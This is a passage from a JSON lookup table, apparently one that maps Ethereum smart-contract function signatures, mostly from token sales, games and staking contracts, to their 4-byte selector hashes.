"0x0c0ef2b0", "getNumberOfPlayersInCurrentGame()": "0xd0785dd7", "calculateTotalGamePrize()": "0xee314997", "getGameBonusAdded()": "0x06a85497", "getGameBalance()": "0xc574d156", "distributePrizes(uint256,uint8)": "0xe521889c", "respawnGame()": "0xa442b824", "generateNumberWinnerQuery()": "0x75a0a7a4", "participate(uint8)": "0x1981d521", "hasAlreadyPlayed(address)": "0x18584a5d", "getBonusAmount()": "0x2bcfcd7b", "CryptoTreasure()": "0xf116260f", "Harimid(uint256)": "0x65488541", "getAssetID()": "0x696b5fb7", "minTx()": "0x533a645c", "getPreviousWinners()": "0x4e599551", "PURCHASES_BONUS()": "0xa9ea9d17", "extraTokensMintedDuringPresale()": "0xc2c7ca1d", "BONUS_PCT_IN_VREO_SALE_PHASE_2()": "0xd578f434", "curs()": "0xa23f41e2", "numPlots()": "0x138b3ab1", "opetWallet()": "0x4d94cee7", "second()": "0x5a8ac02d", "firstTimeLine()": "0x28da740f", "buybackTypeTwo()": "0xcf99a4d9", "devTokensIco2()": "0xb155c7d6", "BSPToken()": "0x91df9562", "POWHclone()": "0x35496d82", "dividendcommission()": "0xa83467a1", "FOUNDERS_SHARE()": "0x3912b99f", "contractFinished()": "0x96f76f11", "blockCreationRate()": "0xaee1d4d3", "RESERVE_ADDRESS()": "0x0c6a3161", "RnMmasterReq()": "0x2e875a9f", "MAX_PUBLIC_SOLD()": "0xaf2096ef", "TOKEN_PER_ETH()": "0xbbc2fcf5", "tokenSellCap()": "0xadddbacb", "softCapLimit()": "0x71bdb914", "privateSaleMinContrAmount()": "0x890a9917", "shouldBeTerminated()": "0x078b247e", "USER_LOCK_BLOCKS()": "0x40dda9af", "root()": "0xebf0c717", "firstYearMinedTokenCap()": "0x607485fe", "RATE_CHANGE_THRESHOLD()": "0x12f58b43", "COPPER_AMOUNT_NDC()": "0xc9ba32f4", "totalFartsReceived()": "0xbb540231", "newIdShip()": "0xb510fe45", "maxEthRaised()": "0xd7730236", "bonusesGiven()": "0x25287c0e", "angelFoundationAddress()": "0x5dd19463", "transform()": "0x3054c79a", "currentStateStartTime()": "0x10898a3e", "sentinel()": "0xf58c251c", "publicSellToken()": "0xc6ddcfe8", "allowedForWithdrawn()": "0x2ecbd6d8", "amountToken()": "0x102ff0b3", "earlyBirdsSupply()": "0xb27b0755", "MarketingMethodAddress()": "0x22f0e6ae", "reserveFundSupply()": "0xcf7730f1", "maxContributionInWei()": "0x86a7b995", "rndInit_()": "0x3ee6d933", "poolTimeLastMinted()": "0x531e4827", "PRICE_PRESALE_START()": "0x6d201095", "holderContract()": "0x4b63036d", "amountBonusEnabled()": "0x8dfced82", "wingsTokensReward()": "0x3aef157b", "goldMigrationsCount()": "0x368daf8f", "mktSupply()": "0x442dfae2", "nonce()": "0xaffed0e0", "partner1_signed()": "0x9b772524", "bank2()": "0xd001425a", "liveDragons()": "0x631d3f3b", "DEFAULT_CLIFF()": "0x0db38253", "stepVestingDuration()": "0x261b2c5e", "getMinAuditPriceMin()": "0xd42ad6ea", "getCastleNum()": "0x7018dcb9", "mainSaleStartdate()": "0xecb071cf", "endRefundingingTime()": "0xba030c8c", "ClaimBlessings()": "0x6418f643", "maximumTokensForFifth()": "0x929aa851", "raisedSale1USD()": "0xe4dc3d8b", "weight()": "0xa1aab33f", "partnerSaleTokensPurchased()": "0xb148313e", "ETH_CLEAR()": "0xa1391297", "second_partner_address()": "0x6d6a01f6", "fundingStartUnixTimestamp()": "0xf8d29219", "PBTTForGas()": "0x06a86539", "communityPool()": "0x14d140b0", "numHodlers()": "0xd48f7196", "m_presaleFinished()": "0xa2271b15", "blocksPerMonth()": "0x31e92f32", "endICOTime()": "0xae1b6405", "publicOfferingWallet()": "0x44f7636c", "stateStartDate()": "0x92c9a926", "weiReqFund()": "0x2fea6915", "epoch_fund()": "0x1a7b11f5", "claimedTokens()": "0x0d92e3e8", "ethRateInUsdCents()": "0x2a04e88a", "bonusAndBountyTokens()": "0x8265dbc1", "isFirstStageFinalized()": "0x7402a9aa", "ownersNum()": "0x195fa903", "bidETHMin()": "0x28086f18", "wallets()": "0xd2f4a50a", "closeBlock()": "0x8cdcbdef", "transfersSuspended()": "0x9e0f35a2", "cNiceGuy()": "0xc355b107", "kBalance()": "0xbfbfa8e4", "LowJackpotHolder()": "0xbfd07c38", "dividendPayment()": "0xab74731d", "levToll()": "0xabbc5d2a", "ethConvertRate()": "0xb212a23e", "addressLeskiw()": "0xe24b7721", "seedCreatedCount()": "0xbb642f65", "setCrowdsaleEndBlock(uint256)": "0xf755a98b", "setEthToTokenConversion(uint256)": "0xc15d7bca", "sacarDoacoes()": "0xf167d695", "abrirDoacoes()": "0x13907d22", "fecharDoacoes()": "0x2dfd27e8", "informarOng(address)": "0xa36c2cbe", "DoacaoEvento()": "0xe8c32d13", "Vegan()": "0x4ce99591", "OftenChainToken()": "0xc5d03fc0", "previousState()": "0x0c1e3fea", "nextState()": "0x14007c6d", "drain_alltokens(address,uint256)": "0x8e0c2882", "EBankerICO(address)": "0x7bb333d6", "EBanker()": "0x6dcb672b", "PGUC()": "0x830321be", "setNote(uint256,bytes32,string,string)": "0xf50522ca", "addNote(bytes32,string,string)": "0x35eead41", "FUN()": "0xcdecd1d7", "TPC(uint256,string,string)": "0x3e0ad2d4", "distributeToken(address,uint256,uint256)": "0x5fea13f8", "Cedex()": "0xe9fd3434", "updateCoeff(address,uint8,uint128,uint256)": "0x70cda533", "packKey(uint8,uint128)": "0xd9592676", "getVerifiedHash(address,uint8,address,uint256,uint256,uint256,uint256,uint256,bytes32,bytes32)": "0x7403db08", "hashOrder(uint8,address,uint256,uint256,uint256,uint256)": "0xa64d1c09", "hashOrderTyped(uint8,address,uint256,uint256,uint256,uint256)": "0xf09a1f87", "reversePercent(uint256,uint256)": "0x288ddec7", "subFees(uint256,uint256)": "0x0b1c4a75", "addFees(uint256,uint256)": "0x91dfe428", "applyCoeff(uint256,address)": "0x41d2c748", "getFees(uint256,uint256,address)": "0xe1e867e5", "getPrice(uint256,uint256)": "0x5cf4ee91", "getTradeParameters(uint256,address,address,uint256,uint256,uint256,uint256)": "0x0b74f633", "sendOrderEvent(address,uint256,uint256,uint256,address,uint256)": "0x1bebf13c", "swap(uint256,address,address,uint256,uint256,uint256,uint256)": "0x1e4ba4d4", "executeOrder(uint256,address,address,uint256,uint256,uint256,uint256)": "0x5a36c394", "sendTradeEvent(uint256[],address[])": "0x81587463", "checkTradeSignature(bytes32,uint256[],bytes32[])": "0x03ddcae9", "saveNonce(uint256)": "0x96e50a8c", "setCoeff(uint8,uint128,uint8,bytes32,bytes32)": "0xd3d77f98", "buyPack(uint8,uint128)": "0x154d6e12", "getPack(uint8,uint128)": "0x5e885c63", "setExpireDelay(uint256)": "0x4edefd31", "delPack(uint8,uint128)": "0x26aebfac", "addPack(uint8,uint128,uint256)": "0xe2595235", "setTakeFee(uint256)": "0x1f4848ef", "setMakeFee(uint256)": "0x00991d8e", "setFeeCollector(address)": "0xa42dce80", "Ethen(address)": "0xdcc7f6b0", "token(uint256,string,string)": "0x28997e32", "MelonWallet()": "0x4768136e", "TransferToWaves(uint256,string)": "0x2f9a7c22", "TransferBase(uint256,string,string)": "0x97ef9779", "PBToken()": "0xd4d227de", "changeICOAddress(address)": "0x6ceccc82", "SunContractToken(address)": "0x28713d0c", "FTTtoken()": "0xe5f363f8", "StandardToken(string,string,uint8,uint256,address)": "0x82e3036c", "AddItemExtra(uint32,uint16,uint256,uint16,uint16,string,address)": "0xd8b11d54", "callOnce()": "0x798b7a71", "changeSymbolName(string)": "0xfd15e091", "DATToken(address)": "0x13e1f2b0", "transferDistribution(address,uint256)": "0x238a3fe1", "lockAddressValue(address,uint256)": "0x00cab8b1", "INK()": "0x87ea9d52", "initCard2()": "0x3469acbb", "initCard1()": "0x850c362a", "initMartial()": "0x07894b1e", "listedMartialsLength()": "0x5d0808f2", "getAddressNickname(address)": "0x8492aa9c", "setNickname(bytes32)": "0x1ae8ab81", "_sendMonsterPrize(uint256,address)": "0xd6bf28e4", "attackMonster(uint256)": "0x2229d348", "getEtherMonsterInfo(uint256)": "0x3ba93114", "getOnSellCardIds()": "0x73ac4739", "getCanAttackMonsterIds()": "0xd2aee00b", "getEtherMonsterNumber()": "0x08af6ebc", "_tryCreateEtherMonster(uint256,uint256)": "0x64fc2d9d", "buyLittleDragonGirlLottery()": "0x857b7dfc", "getCurrentDragonGirlLotteryNumber()": "0xadf2f978", "buyCard(uint256)": "0xc70f5eaa", "cancelSell(uint256)": "0x07c9cd45", "sellCard(uint256,uint256)": "0xa5ccfb06", "buyWuxiaMaster()": "0x8d1bc93d", "currentWulinMasterPrice()": "0x50965f57", "beatMartialOwner()": "0x0ee7c858", "mergeCard(uint256,uint256)": "0x088f5e58", "getGameStats()": "0x1aff30dd", "getCardInfo(uint256)": "0x970129be", "getCardNumber()": "0x05dc2708", "getUserPower(address)": "0x02931e59", "getCardPower(uint256,uint256)": "0xca15fb65", "getCardTypeInfo(uint256)": "0xaa55b55f", "getMartialCardTypeIdList(uint256)": "0xd6bb9eff", "canLotteryFree()": "0x271df6e5", "getMyLastFreeLotteryTimestamp()": "0x5294924d", "getNowTimestamp()": "0x7c024fe2", "debug()": "0x588ee29b", "getDebugNumber()": "0x52a74b82", "setDebugNumber2(uint256,uint256)": "0x3e68119b", "deleteSiringWithId(uint256)": "0xab7891f5", "setSiringWithId(uint256,uint32)": "0xfc906720", "getSiringWithId(uint256)": "0x7b12e074", "getSireId(uint256)": "0xa0557818", "getMatronId(uint256)": "0xbf212637", "getMonsterCount()": "0x9bb5d450", "getMonster(uint256)": "0x62fb6fe1", "createMonster(uint256,uint256,uint256,uint256,uint256,bytes)": "0x8e6ddab1", "CryptoStorage()": "0x936f67ea", "TOTOAirdrop(address,address)": "0x21795635", "WineCoin()": "0xba625fe6", "claimTokenReserveDevelop()": "0x67b21506", "econVestingStage()": "0x6904f583", "claimTokenReserveEcon()": "0x55605eee", "finanVestingStage()": "0xb1f0e40b", "claimTokenReserveFinan()": "0x8d2af65d", "lifeVestingStage()": "0xb6f478de", "claimTokenReserveLife()": "0x47c14648", "BCV()": "0x7589ca40", "getInitiated()": "0xf9a2916f", "getInfos()": "0x643d6dc0", "Owner(address,uint256)": "0x71236b92", "FAOC()": "0x007188d3", "ProofOfTrevonJames()": "0xdba21586", "BancorConverterFactory()": "0xa2233c4d", "ALLYToken()": "0xec066a4c", "KriptoNeed(uint256,string,uint8,string)": "0x6db17f8d", "CICToken(string,string)": "0xf6f32cc4", "approvalFallback(address,uint256,bytes)": "0xebedef1a", "TunTokenERC20()": "0x983c4647", "CCC(uint256,string,string)": "0x53f9ca96", "payWinnerManually2()": "0xb29387e5", "adminIsDead()": "0x119f32dd", "imAlive()": "0x22b19192", "payWinnerManually()": "0xe41d65e0", "changeTicketPrice(uint256)": "0x4630a0ee", "changeThreshold(uint256)": "0x694e80c3", "disableRestriction()": "0xdb8d7c39", "donateToDev()": "0xfba9ce40", "PRNG()": "0x564ef91d", "StopTheFakesPromo()": "0xe471d770", "Tosh(uint256,string,uint8,string)": "0x24153b73", "InfinitiEstate()": "0x02e97770", "MyCrowdsale()": "0x8a814cfe", "YLCToken(uint256,string,uint8,string)": "0x2968d629", "releasableBonus(address)": "0x8bb64abe", "releaseBonus()": "0x6bc5c0cd", "isValidRelease(uint256)": "0xd2135356", "lockBonus(address,uint256)": "0x2e5b604e", "KOIOSTokenPreSale(address,uint256,uint256,uint256,uint256,address)": "0xeb01f42d", "transferManual(address,uint256,string)": "0xdc9f0622", "calculate(uint256)": "0xb9d92de8", "isValidPurchase(uint256,uint256)": "0xe4b1f93a", "KOIOSTokenSale(address,uint256,uint256,uint256,uint256,address)": "0xaafa4827", "KOIOSToken(string,string,uint256,uint256)": "0xcf06b3ba", "HarvestedBabyBrain()": "0x3150a7da", "CoinExchange()": "0xfe1b588f", "KuangJinLian()": "0x5fbff3fc", "PinZhiCoin()": "0xba68693f", "EphronTestCoin()": "0xbcdf266c", "VICCoin()": "0x45aa257a", "TheBittrip()": "0xb80825ff", "CyberCash()": "0x479b321e", "amountOf()": "0x634363f3", "BitcoinWorld()": "0xca862298", "VIRGOToken()": "0x7dac0547", "registerTokenInternal(address,string)": "0x8f80b7bc", "TokenRegistry(address,int256)": "0xac51215b", "SmartCripto()": "0x95fe27d3", "Mychatcoin()": "0x65fae654", "GITToken()": "0xe3b10447", "EVER()": "0x7b965785", "ItalyToken()": "0xd783aacf", "GVTTeamAllocator()": "0x37d876b6", "Cscchain(uint256,string,string)": "0xa9b0e8d5", "CIBOS()": "0xc5b15caf", "batchTransferSingleValue(address[],uint256)": "0x8fa1ae05", "GridyToken()": "0xb024b2e3", "getAds()": "0x0955ae99", "setActive(uint256,bool)": "0xe60a955d", "marketBuy(uint256)": "0x8fb84bb0", "setSale(uint256,bool,uint256)": "0x87b01dc9", "update(uint256,string,string,string)": "0x6522bff1", "buy(uint256,uint256,uint256,uint256,string,string,string)": "0x3efea4d1", "DapCarToken()": "0x8ea1ee86", "WILLTOKEN(uint256,string,uint8,string)": "0x089d5200", "getUserDocId(address,uint32)": "0x00dfd21a", "getUserDocCount(address)": "0x11ffe7c9", "makeVisible(uint128)": "0x07de67dc", "makeInvisible(uint128)": "0xb7b2e501", "writeDocument(uint128,uint16,uint256,bytes32[],string,string,string)": "0xffb308ef", "editIt(uint128,uint64,bytes32[],string,string,string)": "0x7542890d", "documentIt(uint128,uint64,bytes32[],string,string,string)": "0x09ee75a2", "revokeEditorRights(address)": "0xd748d1f6", "grantEditorRights(address)": "0x1cb3d9be", "DocumentaryContract()": "0x648d6367", "IADOWR()": "0x1797814e", "XdacToken(uint256)": "0x5be5d9e3", "STS(uint256,string,uint8,string)": "0xfab88d39", "ThankYouToken()": "0x95f9432d", "stopTeamTokenTransfer()": "0x1ee5f936", "releaseTeamTokenTransfer()": "0x0e5fdad4", "setTeamMember(address,bool)": "0x60bba03d", "BlockOne()": "0x82b49248", "PubPresale(address,address,address)": "0x40a51199", "Ether()": "0x125e527e", "getEventResult(uint32)": "0x9265996c", "setEventResult(string,uint32,uint8)": "0x84b0e001", "createEvent(string,uint256,uint32)": "0x7df8833a", "DariumToken(address)": "0x4e5d49a0", "resetCurrentTokenOfferingRaised()": "0x50c38479", "offeringEnabled()": "0xa86477ad", "isOfferingStarted()": "0x9db28672", "currentTokenOfferingRaised()": "0xb7ba6050", "currentTotalTokenOffering()": "0x63a3cc80", "HafizToken()": "0xc9679537", "AcquinomToken(address)": "0xff163aca", "Timeless()": "0x2cca23f1", "_transferEther(address,uint256)": "0x4637fd1a", "_doTradeWithEth(address,uint256,address,uint256)": "0x7e1028b2", "_doTradeForEth(address,uint256,address,uint256)": "0xf5e37d57", "setEMAValue(uint256)": "0xe2506eab", "setGasUpperBound(uint256)": "0x63621532", "setMinimumCollateralInEthAmount(uint256)": "0x9511309a", "processCollateral(address,address,uint256,uint256,uint256,uint256,bool)": "0x19e858e5", "checkSTAGE()": "0x04b65e74", "setAddress(uint256,address)": "0xac4ce2c6", "setCrowdsaleStop()": "0x43f294a6", "GHPToken()": "0x1e095eb3", "JFDToken()": "0xcb25d9a2", "IdolToken()": "0xd69b6cf4", "getWalletInfo()": "0xc352dae2", "addTransaction(address,uint256,uint256,string,uint256,bytes)": "0xddd505f6", "executeTransaction(uint256,uint256)": "0x3c536938", "approveTransaction(uint256,uint256,string,uint256)": "0x7453de96", "sendTransaction(address,uint256,uint256,string,uint256,bytes)": "0x78912eae", "join(address,string,string,uint256)": "0xa0e8d21f", "isApprove(uint256)": "0x1f1e1295", "isTransferNotExpired(uint256,uint256)": "0x3f6c0c60", "isTransferConfirmed(uint256)": "0x8952f965", "GBTToken()": "0x8a26d4c4", "getTransferTime()": "0x4d428204", "remit()": "0x7507ba39", "purchase(address,address)": "0xdde5a65d", "_getBonus()": "0xb515622f", "setStageLength(uint256)": "0x7b1278e9", "getStageInfo()": "0xa9396a1b", "updateStageBySaled()": "0x881c255e", "updateStageByTime()": "0x239d339b", "transferToken(uint8,address,uint256)": "0x83b60a33", "setSaler(address)": "0x33fbff32", "MonyaToken()": "0xb0b503f9", "burn_lost()": "0x93d96049", "Magzia()": "0xec57e25b", "STARL()": "0x2cf6b532", "BG1Token()": "0xeedf504d", "checkLockedBalance(address,uint256)": "0x9ab2cf0d", "DJPToken()": "0x4ad37538", "BlackToken()": "0xad3a05ca", "JULY()": "0xbe4ce05c", "BifrostToken()": "0xa4d1f29f", "BallotO(address[],uint256[])": "0x7644ecbf", "OneWorldCryptoCoin()": "0xe6527376", "setAttr0(uint256)": "0x574f9a81", "getX2(uint256)": "0xb7d4e5fd", "participant()": "0x37a6d42b", "TOP1000()": "0xedd403a9", "IKT(uint256,string,uint8,string)": "0x541b2173", "APTest1()": "0xf9c38ebf", "SpencerToken()": "0xaa235449", "stakeAirdropWhileLocked(address,address,uint256,bytes)": "0xbfa1bd62", "stakeForAirdrop(address,uint256,bytes)": "0x20e65a42", "stakeAirdrop(uint256,bytes)": "0x5d2247a5", "getPersonalAirdrop(address,address)": "0xeb7a6471", "withdrawAirdrop(uint256,bytes)": "0x9b566564", "transferAirdrop(address[],uint256,bytes)": "0x2e4099bd", "getPersonalAirdropAmount(address,address)": "0xeae4e5ce", "getPersonalAirdropUnlockTimestamp(address,address)": "0xcad1d39b", "stakeForWithLockup(address,address,uint256,bytes)": "0x66e13d36", "getPersonalStakes(address,address)": "0xe662e9af", "totalStakedFor(address,address)": "0x2cc205d9", "getPersonalStakeForAddresses(address,address)": "0x86a2f98a", "getPersonalStakeAmounts(address,address)": "0xf3f52865", "getPersonalStakeUnlockedTimestamps(address,address)": "0x1968bf4f", "airdropWithLockup(address,address,uint256,bytes)": "0x37086c8e", "_getPersonalAirdrop(address,address)": "0x06eccccb", "_withdrawAirdrop(uint256,bytes)": "0x96a9df88", "_transferAirdrop(address[],uint256,bytes)": "0xd0f3235d", "_getPersonalAirdropAmount(address,address)": "0x13debf7c", "_getPersonalAirdropUnlockTimestamp(address,address)": "0xebbc9543", "totalStakedAt(uint256)": "0xc9c53232", "totalStakedForAt(address,uint256)": "0xede38421", "lastStakedFor(address)": "0x233b7451", "supportsHistory()": "0x7033e4a6", "stakeFor(address,uint256,bytes)": "0x0ef96356", "TCASHx()": "0xbdf44067", "_removeTopic(string)": "0x5ee7144c", "declineAll()": "0x381656e2", "decline(string)": "0x4a8beaf4", "accept(string)": "0x0fba4ca1", "SECRET_BONUS_FACTOR()": "0xc088df47", "matured_timestamp()": "0x44f96bc6", "MIN_PRE_ICO_SLOGN_COLLECTED()": "0x57ce0ec0", "blessings()": "0x9c0df4f2", "splitInService()": "0x0aa28f09", "angelExchangeRate()": "0x483b04e3", "NAME_ARK()": "0xfc753ce3", "payoutCursor_Id_()": "0x6b6438cc", "getInterest()": "0xe5a4bed3", "getVIPCount()": "0x8971739b", "FOUNDERS_TOKENS_VESTED_2()": "0x769f194f", "maxReferrerTokens()": "0x2a523e89", "VOLUME_50()": "0x406a0e61", "tgrAmountCollected()": "0x4aab421d", "shouldBeStarted()": "0x36134a4b", "transferAllowed()": "0x34fec467", "getNumTokensPurchased()": "0xab062643", "endICOStage1()": "0x2ef2edb8", "lastPriceUpdateTime()": "0x49b9a7af", "danserviceTeamAddress()": "0xc3650a21", "icoPhase1Start()": "0xc601b7f8", "amountToTransfer()": "0xb21ce425", "lastUpdateEtherPrice()": "0x61836b0e", "forceResetPeriod()": "0x76fe192a", "BOUNTY_TOKENS_PERCENT()": "0x2fdf795a", "minerTotalYears()": "0x34ab32e1", "isRefundsEnabled()": "0xfdcd0a18", "secondBonusEnds()": "0x0ded7f62", "beneficiary3()": "0xa07f5f84", "getNumLoveItems()": "0xfb29aa97", "isBatched()": "0xbb1583fc", "unprocessedProfits()": "0xc4a50433", "reserveY2()": "0xe81d6c6f", "REBALANCE()": "0xd3c9ad17", "TOKEN_AMOUNT_ICO_STAGE1_PRE_SALE2()": "0x2494aef9", "gasAfter_()": "0x44e880c1", "cutoffBlock()": "0x2c6a0140", "recentWinners()": "0xe75303a5", "MINIMUM_LOCK_AMOUNT()": "0x1671719d", "totalSoldOnPresale()": "0x6a502578", "bankRollBeneficiary()": "0x8e72a926", "MAX_DTH()": "0x2dde7dbc", "joy()": "0x465b43d0", "OVISRESERVED_TOKENS()": "0xcf1ee6f9", "PRIVATESALE_START_DATE()": "0xb8471085", "why()": "0xaf35b3f1", "Public_Sale_SUPPLY()": "0x810ba058", "creater()": "0x45653a6d", "payoutRange()": "0x7ef1ab2c", "successfulFunding()": "0x891f5ce5", "EARLY_INVESTOR_AMOUNT()": "0x08b490f0", "closeClaims()": "0xcfee88db", "dailyLottery()": "0x6f26d566", "unsoldAllocationCount()": "0x7f8dafef", "createLastDay()": "0x5cd7c8bc", "min_payment()": "0xfd607594", "perValue()": "0xd48210bc", "TLN_TOKEN_NAME()": "0x9717137a", "TEAM_RESERVE()": "0xe5408eae", "numElements()": "0x1e0e3925", "MAX_INPUT_USERS_COUNT()": "0xe4232069", "teamTrustAccount()": "0x2fa94fb3", "investedUSD()": "0xcad079ed", "RANGEEND_3()": "0x2e0c6c36", "updateGasCost()": "0x61d43971", "totalLBSold_GENERAL_1()": "0x000e2f3a", "signedApproveSig()": "0xa3fc136a", "MULTISIG_OWNER()": "0x06b70f62", "usdToHavPrice()": "0xc40b8dcf", "servusToken()": "0xa6b4492f", "crowdsaleLive()": "0x6b3ac430", "nextReleaseTime()": "0x6d6a4889", "tokenNAVMicroUSD()": "0xc85aff48", "subDev()": "0xeea4cf1c", "o3Address()": "0x085fd114", "PHASE_4_PRICE()": "0x7372196c", "secondsPerYear()": "0x252e40b1", "refundsIssued()": "0x76b33367", "ICO_LEVEL_1()": "0xc4b71cec", "rateEarlyStage2()": "0xa210f934", "migrationAccountCounter()": "0xb993a91f", "privateIcoCap()": "0xd55b7703", "periodSales()": "0xab067a5b", "S2()": "0x65581793", "uniq(uint32[])": "0x8ae0a7ec", "promisor()": "0xc2d8de54", "previousPeriodRate()": "0x1336a756", "redeemedCards()": "0x686f4564", "maxSet()": "0xdda943d6", "deathData_a17()": "0x0edf2134", "MaxSantaRewardPerToken()": "0xb7a693d7", "areTokensSended()": "0x615af5fb", "DEFROST_MONTHS()": "0xd6d5c8d5", "initialBuyPrice()": "0x3ca6d5a9", "TIE()": "0x09df06b7", "contractSolidStamp()": "0x1357b862", "buyerfeeDivide()": "0x463107d4", "fourthStageMinted()": "0xaf3996c3", "emojisan()": "0x354eb40b", "currentDistributionAmount()": "0x7faddcfb", "read_i64()": "0x1881f980", "read_i32()": "0xbb2f159b", "read_i16()": "0x8067f7ba", "read_i8()": "0x03ca558a", "read_u64()": "0x815639ea", "read_u32()": "0xaefa7550", "read_u16()": "0x86b35f79", "read_u8()": "0x7ca5d8fa", "getConfigEntryInt(bytes32)": "0x855fe6ed", "addConfigEntryInt(bytes32,uint256)": "0x3e3657a5", "getConfigEntryAddr(bytes32)": "0x4cb44f8d", "addConfigEntryAddr(bytes32,address)": "0xfb95d9e7", "DigixConfiguration()": "0xdce4ae87", "Oracle(bytes32)": "0x2bfaf3da", "isPASigned(uint32)": "0xa8dab783", "getPAAttributes(uint32)": "0x4563b743", "removePA(uint32)": "0x837e60e6", "signPA(uint32)": "0x24896a47", "addPA(string,string,string,address,address,uint32,uint32,address,address,uint32,string)": "0x9a33c610", "PLAgreements(address,address)": "0xe8022dc9", "approved()": "0x19d40b08", "isMint(int256,address)": "0x98366d1c", "Configurable()": "0x44a17516", "test_9b_testGoodTransfer_thenInvalid()": "0xe92e4505", "test_9a_transferShouldBeFalse()": "0x7787dfaf", "test_9_checkDestructionOverflow_shouldThrow()": "0xaa127ae3", "test_8_basicTransfersBetweenAccounts_increaseBlocksBy300()": "0x4e9ee738", "test_6_basicTransfer_increaseBlocksBy1000()": "0xce63066f", "test_5_generateSecondAccountBalance_increaseBlocksBy1000()": "0x4fd6b325", "test_4_generateTokensAccrossBlocksAfterDestroy_increaseBlocksBy1000()": "0xd258d7b6", "test_3_destoryTokensAccrossBlocks_increaseBlocksBy1000()": "0x373c1df9", "test_2_destroyTokens()": "0x7034c939", "test_1_generationAcrossBlocks_increaseBlocksBy100()": "0xd901b98c", "test_0_testGenerateTokens()": "0x54e4df26", "TokenUser(address)": "0x50dc26ec", "simpleVotingDapp(bytes32[])": "0x23dddaba", "listNode()": "0x609df32f", "deleteNode(address)": "0x2d4ede93", "approveNode(address)": "0xdd4c97a0", "newNode(address)": "0xddad2ffe", "readPaymentChannels()": "0xcb7b3f0a", "readAnalyticsMap()": "0x190ef61d", "paymentChannelsCount()": "0xad6c8762", "iaInvestedBy(address)": "0x745ce3bb", "createMorePaymentChannelsInternal(uint256)": "0x816a873f", "InvestmentAnalytics()": "0x7b2454c2", "AnalyticProxy()": "0xc243431e", "lstFunc(uint256[])": "0x0edddd3e", "recoverSimple(bytes32,uint8,uint256,uint256)": "0x6ea07a36", "mixStringAddressFunc(string,address)": "0x1599a096", "signatureFunc(bytes)": "0x8cae013e", "bytesFunc(bytes,bytes)": "0xa20cc495", "bytes32Func(bytes32,bytes32)": "0x8435f147", "complexReturnType(int256,string,bool,string)": "0xc080f08f", "mixWithStringFunc(int256,string,bool,string)": "0x300a1a7f", "dynArrayFunc(int256[])": "0x6ac4e08b", "arrayFunc(int256[10])": "0xdab951ba", "boolFunc(bool,bool,bool)": "0xfbe04e1c", "dateFunc(int256)": "0xa63832a0", "addressPayableFunc(address,address)": "0x4c81a1db", "addressFunc(address,address)": "0xc7b799ae", "intFunc(int256,int256,int256)": "0x062e53f3", "smallUintFunc(int256,uint8,uint256)": "0xe59c4fa3", "uintFunc(uint256,uint256,uint256)": "0x40a7ed8b", "strFunc(string)": "0x915e1044", "useless(uint256)": "0x164ce703", "nada(uint256)": "0x7802f4e4", "steal()": "0xcf7a8965", "setBank(address)": "0x090d23b9", "getTwo()": "0xee784123", "setTwo(uint256)": "0x91ce8e04", "debit(uint256,uint256)": "0xe747f31c", "credit(uint256,uint256)": "0xab7ccc1c", "rejectTransfer(uint256)": "0x12effc32", "completeTransfer(uint256)": "0x619c83ed", "internalTransfer(uint256,uint256,uint256)": "0x71c58b25", "revertTransfer(uint256,uint256,uint256,uint256,uint256,uint256)": "0x69d62bf4", "transfer(uint256,uint256,uint256,uint256,uint256,uint256)": "0x6b3416b5", "getBalance(uint256)": "0x1e010439", "MainBank()": "0x934bb037", "getPhaseExpiry()": "0x7a04f9ea", "increaseBid(uint256)": "0x0070c537", "OnePhaseAuction()": "0x01024700", "getHousePayout()": "0x0f1e3b5b", "getWinnerPayout()": "0xf27db8c9", "setWinner(address)": "0xd9fca769", "buy(address,uint256)": "0xcce7ec13", "Lottery(string,uint256,uint256)": "0xda27cb0f", "getKilled()": "0x07304435", "setUpgradedOwner(address,address,address)": "0xc0362523", "Migrations4()": "0x77b08df0", "Migrations3()": "0x5eba2472", "Migrations2()": "0x2d7bf927", "ProtocolToken()": "0x1bef9059", "decreaseApproval(address,uint256,bytes)": "0x7272ad49", "increaseApproval(address,uint256,bytes)": "0x16ca3b63", "numActiveMembers()": "0xda9bca21", "numMembers()": "0x4698d110", "ids(address)": "0x1847c06b", "RaffleGraphBook(string,uint256)": "0x9026bd65", "teamSharePercent()": "0x67061a55", "Leverages()": "0x73c8c4bf", "bonusAllowed()": "0xb851ed97", "CRS()": "0xe6aa96a5", "weiCrowded()": "0xecd22328", "periodICOStage3()": "0xf81126a7", "prev_week_ID()": "0x0b3d7174", "standardToken()": "0x4c7d7d3f", "spermlordAddress()": "0xe309f318", "adjusted()": "0x935dfb71", "maxUserCreatedPerformance()": "0x447ee48f", "isTeamVestingInitiated()": "0x43d8b570", "UNLOCK_TEAM_2()": "0xfbcf1594", "teamAndFounders()": "0xc519099d", "ledger()": "0x56397c35", "checkPos()": "0xd6d4136a", "tryUnlock()": "0xeabd94ba", "referralOwnerPercent()": "0x89edf114", "ethLastUpdate()": "0xc68b82c9", "TotalETHGivenToNorthPole()": "0x2fc77d85", "isKYCRequired()": "0x91304f1f", "tokenCreated()": "0xacb39d30", "incentiveDistributionMaxRounds()": "0xcbbaed1b", "lastBlock_f8Hash_uint256()": "0x95d47f2f", "twentyThirtyTokens()": "0x5c20eec6", "icoTokensIssued()": "0x3efab21b", "fundingDurationInHours()": "0xa958ffc4", "highBonusRate()": "0x462c6edb", "tokensForBurn()": "0x1d777856", "BTC_SUISSE_TIER_1()": "0x949430f0", "initialReward()": "0xabee967c", "unsold()": "0xc9cb7204", "icoEndBlock()": "0x47d70f74", "Hard_Cap()": "0x00f49203", "ICOHardcap()": "0x847eefb6", "tomoConvertRate()": "0xbec809ec", "OWNERS_AND_PARTNERS_ADDRESS()": "0x9dfaa207", "announced()": "0xba38c599", "icoSucceeded()": "0x362cb8ff", "lastBlock_f5()": "0x49a69078", "recoveryAfterPeriod()": "0x089c22ad", "SHARE_FOUNDATION()": "0x52ad6468", "Company()": "0x5092f97e", "getLossTokenAmount()": "0xf91a545b", "RESERVED_STAFF_GROUP()": "0x6dd0c51e", "ownbalance()": "0xd9c7041b", "platformWithdrawalProposed()": "0xc974631b", "ADDR_TKG_CHARITY()": "0x592c518f", "teamMultisig()": "0xdbc0c085", "availableEmission()": "0xfb8632b8", "minBid()": "0x3e109a19", "buypr0coinsAgainstEther()": "0xed769922", "_mainsaleSupply()": "0x609b5785", "price_per_eth()": "0x96dfa78b", "ethFundMain()": "0x6bf82d74", "team_address_count()": "0x487f3f06", "MAX_UINT()": "0xe5b5019a", "isEcoAllocated9()": "0x99d7dd25", "thisEther()": "0xe0f3691d", "annual_circulating_supply()": "0x2e77b3d0", "winnerBidValue()": 